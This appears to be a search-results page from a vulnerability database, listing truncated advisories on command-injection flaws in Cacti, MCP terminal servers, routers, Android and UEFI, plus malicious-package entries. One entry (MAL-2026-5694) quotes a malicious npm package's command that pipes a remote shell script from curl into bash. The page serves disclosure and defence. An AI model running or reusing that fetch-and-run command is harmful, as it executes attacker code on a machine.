36 matches found
Linux Distros Unpatched Vulnerability : CVE-2026-40079
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Cacti is an open source performance and fault management framework. Versions 1.2.30 and prior are vulnerable to Command Injection due to lack of sanitization in...
PYSEC-2026-551 terminal-controller-mcp vulnerable to Command Injection
A command injection vulnerability in the executecommand function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input...
CVE-2026-40079
Cacti is an open source performance and fault management framework. Versions 1.2.30 and prior are vulnerable to Command Injection due to lack of sanitization in the escapecommand function. The escapecommand function at lib/rrd.php is a no-op: it returns $command unchanged. The command line built ...
CVE-2026-40079
Cacti is an open source performance and fault management framework. Versions 1.2.30 and prior are vulnerable to Command Injection due to lack of sanitization in the escapecommand function. The escapecommand function at lib/rrd.php is a no-op: it returns $command unchanged. The command line built ...
MAL-2026-5694 Malicious code in internallib_v856 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...
CVE-2026-36045
CVE-2026-36045 affects picoclaw up to v0.1.2 (and earlier). The issue is an OS command injection in the ExecTool component (pkg/tools/shell.go) caused by an incomplete denylist in guardCommand() that attempts to restrict shell execution. The vulnerability description is consistently reported acro...
CVE-2026-7593 Sunwood-ai-labs command-executor-mcp-server MCP index.ts execute_command os command injection
A security vulnerability has been detected in Sunwood-ai-labs command-executor-mcp-server up to 0.1.0. This impacts the function executecommand of the file src/index.ts of the component MCP Interface. The manipulation leads to os command injection. Remote exploitation of the attack is possible. T...
CVE-2026-7593
A security vulnerability has been detected in Sunwood-ai-labs command-executor-mcp-server up to 0.1.0. This impacts the function executecommand of the file src/index.ts of the component MCP Interface. The manipulation leads to os command injection. Remote exploitation of the attack is possible. T...
PT-2026-22594
Name of the Vulnerable Software and Affected Versions Tenda W20E version 4.0br V15.11.0.6 Description A command injection issue exists in the Tenda W20E router firmware. The firmware does not properly validate the usbPartitionName variable before using it within the doSystemCmd function. This can...
CVE-2024-26479
An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the Command execution function...
CVE-2025-61492
A command injection vulnerability in the executecommand function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input...
Terminal Controller for MCP 安全漏洞
Terminal Controller for MCP is a context protocol server by the individual developer GongRzhe. A security vulnerability exists in Terminal Controller for MCP version 0.1.7, which stems from a command injection in the executecommand function that could lead to the execution of arbitrary commands...
PT-2026-1826
Name of the Vulnerable Software and Affected Versions terminal-controller-mcp version 0.1.7 Description A command injection issue exists in the execute command function of the software. Attackers can execute arbitrary commands by providing a crafted input. The vulnerability can lead to arbitrary...
EUVD-2007-1953
Malware in sbrugna...
EUVD-2008-5012
Malware in sbrugna...
EUVD-2025-25100
Malicious code in bioql PyPI...
VulnCheck KEV: CVE-2025-45988
Blink routers BL-WR9000 V2.4.9 , BL-AC2100AZ3 V1.0.4, BL-X10AC8 v1.0.5 , BL-LTE300 v1.2.3, BL-F1200AT1 v1.0.0, BL-X26AC8 v1.2.8, BLAC450MAE4 v4.0.0 and BL-X26DA3 v1.2.7 were discovered to contain multiple command injection vulnerabilities via the cmd parameter in the bsSetCmd function...
CVE-2025-22408
In rfcchecksendcmd of rfcutils.cc, there is a possible way to execute arbitrary code due to a use after free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation...
CVE-2025-22408
CVE-2025-22408 affects Google Android in the rfc_check_send_cmd function of rfc_utils.cc, caused by a use-after-free; this enables remote code execution with no extra privileges and without user interaction. Public documents confirm the issue as a System-level vulnerability in Android, with CVSS ...
CVE-2025-7027
Gigabyte Gigabyte UEFI SMM vulnerabilities (CVE-2025-7027) allow a local attacker to control both read and write addresses in SMRAM via the SwSmiInputValue 0xB2 handling, using an unvalidated UEFI NVRAM pointer (SetupXtuBufferAddress) and an attacker-controlled RBX-based pointer to perform arbitr...